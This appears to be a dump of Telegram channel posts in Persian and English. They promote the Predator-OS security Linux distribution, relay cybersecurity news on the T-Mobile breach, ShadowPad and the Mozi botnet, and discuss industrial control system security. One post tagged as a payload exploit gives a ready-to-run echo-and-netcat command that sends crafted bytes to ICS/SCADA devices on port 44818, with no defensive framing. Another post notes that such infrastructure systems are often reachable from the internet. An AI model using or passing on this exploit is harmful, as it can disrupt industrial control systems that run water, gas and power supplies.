Forwarded from Predator-OS
Predator-OS
📌 Predator OS download https://predator-os.com/down/predator-os-20.04-LTS.iso
بصورت رسمی الان میتونید دانلود کنید و صفا کنید👌🌷
استارت ۳ پروژه بزرگ هم بزودی میخوره فقط محبت کنید تا میتونید توزیع رو به دوست و آشنایان معرفی کنید اینبار حسابی حال دلتون رو جا میاریم بچه های خوب و با سواد سایبری کشور عزیزمان یا حق 🌹
قان یاغدی کربلاده_حاج محمد باقر منصوری
Nohetourke
حاج محمدباقر منصوری
#موقت
#موقت
سلام
صفحه رای گیری سایت distrowatch برای توزیع predator-os
لطفا رای بدین به توزیع ممنون
=====================
https://distrowatch.com/
بالای سایت قسمت
Submit Distribution
رو کلیک کنید. و در صفحه باز شده قسمت
Projects waiting evaluation:
گزینه submit در مقابل اسم توزیع رو کلیک کنید.
@UNIDENTIFIED_TM
صفحه رای گیری سایت distrowatch برای توزیع predator-os
لطفا رای بدین به توزیع ممنون
=====================
https://distrowatch.com/
بالای سایت قسمت
Submit Distribution
رو کلیک کنید. و در صفحه باز شده قسمت
Projects waiting evaluation:
گزینه submit در مقابل اسم توزیع رو کلیک کنید.
@UNIDENTIFIED_TM
اپراتور T-Mobile هک اطلاعات محرمانه ۴۷ میلیون مشترک خود را تایید کرد
اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارشهای رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
اپراتور T-Mobile اعلام کرده است که تحقیقات داخلی پیرامون حادثه اخیر هنوز در جریان است، اما افشای اطلاعات ۴۷.۸ میلیون کاربر از سوی این شرکت تایید شده است. طبق آخرین گزارشهای رسمی مالی منتشر شده، اپراتور گفته شده دارای بیش از ۱۰۴ میلیون مشترک است.
@UNIDENTIFIED_TM
#news
یک پلت فرم بد افزار مدولار با نام ShadowPad که به صورت خصوصی فروخته می شود ، مورد علاقه گروه های جاسوسی سایبری چین قرار گرفته است.
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.
@UNIDENTIFIED_TM
این بک دور اصلی بود که در کمپین های جاسوسی متعدد از جمله حملات CCleaner ، NetSarang و ASUS Supply-Chain استفاده می شد.
@UNIDENTIFIED_TM
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد.
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”
@UNIDENTIFIED_TM
#news
محققان مرکز امنیت تهدیدات امنیتی مایکروسافت و بخش 52 در Azure Defender برای IoT در مقاله ای فنی گفتند: "با آلوده کردن روترها ، آنها می توانند حملات man-in-the-middle (MITM)-از طریق ربودن HTTP و جعل DNS-برای به خطر انداختن نقاط پایانی و استقرار باج افزار یا ایجاد حوادث ایمنی در امکانات OT انجام دهند.”
@UNIDENTIFIED_TM
#news
Unidentified T E A M
بر اساس یافته های جدید ، Mozi ، یک بات نت همتا به همتا (P2P) که هدف آن دستگاه های اینترنت اشیا است ، قابلیت های جدیدی را به دست آورده است که به آن اجازه می دهد تا در دروازه های شبکه تولید شده توسط Netgear ، Huawei و ZTE به ماندگاری برسد. محققان مرکز امنیت…
According to new findings, Mozi, a peer-to-peer (P2P) botnet targeting IoT devices, has acquired new capabilities that allow it to access the network gateways produced by Netgear. Huawei and ZTE reach longevity.
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."
@UNIDENTIFIED_TM
#news
"By infecting routers, they can launch man-in-the-middle (MITM) attacks - by hijacking HTTP and forging DNS - "Endanger endpoints and install ransomware or create security incidents in OT facilities."
@UNIDENTIFIED_TM
#news
Forwarded from Predator-OS
Media is too big
VIEW IN TELEGRAM
The Tutorial mode in Linux predator-os includes many offline tutorials which will be available to beginners and academy users through this menu.
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
In this mode, many training files, such as:
*.overview on security
*.Security checklists
*.Cheat sheets. A variety of cheat sheets from Linux, security, hacking, programming languages, etc.
*.Linux shortcut key
*.Quick tutorial and Linux tutorial
*.Quick security training and security tutorial
All the above files are available through the menu in pdf format.
==========
مد آموزشی در لینوکس predator-os شامل آموزشهای زیادی به صورت آفلاین که از طریق این منو برای کاربران تازه کار و آکادمی در دسترس خواهد بود.
در این مد فایل های آموزشی زیادی ازجمله:
معرفی امنیت
چک لیست های امنیتی
برگ های تقلب cheat sheet
کلید میانبرهای لینوکس
آموزش سریع و خود آموز لینوکس
آموزش سریع امنیت
contact us:
www.predator-os.com
https://t.me/joinchat/QPMh3Khn9izpmzqf
https://t.me/predator_os
info.predator.os@gmail.com
https://github.com/hosseinseilani
https://www.instagram.com/predator.os
دستور اکسپلویت کردن آسیب پذیری برخی دیوایس های ICS و SCADA روی پورت 44818/TCP
@UNIDENTIFIED_TM
#payload_exploit
echo -e ”\x00\x00\xE8\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00”
| nc -w 2 <target_IP> 44818 > /dev/null
@UNIDENTIFIED_TM
#payload_exploit
Unidentified T E A M
@UNIDENTIFIED_TM
امنیت سایبری در تاسیسات هسته ای :
لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.
ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.
2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.
سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.
اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team
لایه های امنیتی در تاسیسات هسته ای به شدت زیاد هستند و دیتاسرور و لایه IT تحت حفاظت DMZ قرار دارند.
ارتباط هر لایه با لایه دیگر قطع میشود، سیستم ها از شبکه نیز جدا هستند و تمام برنامه ها در محیط سندباکس باز میشوند.
2 فایروال در لایه IT قبل از PLC و SCADA وجود دارد.
سیستمی به اسم SCRAM با افزایش دما یا فشار و تغییرات غیرمنتظره راکتور هسته ای را خاموش میکند. تمام اینها باعث برقراری امنیت زیاد و شکست خوردن بسیاری از حملات قبل از رسیدن به مراحل خطرناک می شود.
اما این امنیت بالا فقط در تاسیسات هسته ای صدق میکند، سیستم های کنترل صنعتی در مهم ترین زیرساخت های هر کشوری وجود دارند و تمام منابع و آب،گاز،نفت،برق و ... توسط این سیستم ها کنترل میشود که خیلی از آنها به اینترنت نیز وصل هستند و قابل نفوذ می باشند.
@UNIDENTIFIED_TM
#scada
#ics
#unidentified_security_team